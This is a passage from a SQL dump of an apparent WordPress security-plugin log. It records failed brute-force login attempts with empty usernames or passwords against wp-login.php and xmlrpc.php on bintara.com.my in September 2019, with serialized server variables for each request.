13:07:43',18255800,19555944,'https://bintara.com.my/xmlrpc.php',1,0,'51.77.64.186'),(24559,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"51.77.64.186\";s:11:\"REMOTE_PORT\";s:5:\"45040\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDamrIp53uPsY7BKArxdAAAAEs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568725658.897\";s:12:\"REQUEST_TIME\";s:10:\"1568725658\";}}','notice','2019-09-17 13:07:41','2019-09-17 13:07:39',17739472,19230392,'https://bintara.com.my/wp-login.php',1,0,'51.77.64.186'),(24558,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"132.148.25.34\";s:11:\"REMOTE_PORT\";s:5:\"43354\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDZb1d3b0tfDgYOg7j-RgAAAI0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568725359.5405\";s:12:\"REQUEST_TIME\";s:10:\"1568725359\";}}','notice','2019-09-17 13:02:41','2019-09-17 13:02:39',18256640,19556064,'https://bintara.com.my/xmlrpc.php',1,0,'132.148.25.34'),(24557,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"132.148.25.34\";s:11:\"REMOTE_PORT\";s:5:\"41850\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDZZ1d3b0tfDgYOg7j-RQAAAI8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568725351.4583\";s:12:\"REQUEST_TIME\";s:10:\"1568725351\";}}','notice','2019-09-17 13:02:33','2019-09-17 13:02:31',17906384,19231976,'https://bintara.com.my/wp-login.php',1,0,'132.148.25.34'),(24555,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"108.175.10.113\";s:11:\"REMOTE_PORT\";s:5:\"59110\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDXXFd3b0tfDgYOg7j@CQAAAI8\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568724829.0545\";s:12:\"REQUEST_TIME\";s:10:\"1568724829\";}}','notice','2019-09-17 12:53:50','2019-09-17 12:53:49',18259680,19559768,'https://bintara.com.my/xmlrpc.php',1,0,'108.175.10.113'),(24556,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"132.148.25.34\";s:11:\"REMOTE_PORT\";s:5:\"41850\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDZZ1d3b0tfDgYOg7j-RQAAAI8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568725351.4583\";s:12:\"REQUEST_TIME\";s:10:\"1568725351\";}}','notice','2019-09-17 13:02:32','2019-09-17 13:02:31',17745136,19231976,'https://bintara.com.my/wp-login.php',1,0,'132.148.25.34'),(24518,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"86\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"59.152.241.38\";s:11:\"REMOTE_PORT\";s:5:\"47302\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYC@g1d3b0tfDgYOg7jrHAAAAJE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568718468.1146\";s:12:\"REQUEST_TIME\";s:10:\"1568718468\";}}','notice','2019-09-17 11:07:49','2019-09-17 11:07:48',17742144,19233352,'https://bintara.com.my/wp-login.php',1,0,'59.152.241.38'),(24519,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"59.152.241.38\";s:11:\"REMOTE_PORT\";s:5:\"47982\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYC@hpS9022wVwVSW96REwAAAAg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568718474.2997\";s:12:\"REQUEST_TIME\";s:10:\"1568718474\";}}','notice','2019-09-17 11:07:55','2019-09-17 11:07:54',18256608,19553392,'https://bintara.com.my/xmlrpc.php',1,0,'59.152.241.38'),(24520,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"52.64.168.0\";s:11:\"REMOTE_PORT\";s:5:\"42930\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDAcLIp53uPsY7BKArtoQAAAEk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568718967.4024\";s:12:\"REQUEST_TIME\";s:10:\"1568718967\";}}','notice','2019-09-17 11:16:12','2019-09-17 11:16:11',17744576,19231968,'https://bintara.com.my/wp-login.php',1,0,'52.64.168.0'),(24521,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"52.64.168.0\";s:11:\"REMOTE_PORT\";s:5:\"42930\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYDAcLIp53uPsY7BKArtoQAAAEk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568718967.4024\";s:12:\"REQUEST_TIME\";s:10:\"1568718967\";}}','notice','2019-09-17 11:16:12','2019-09-17 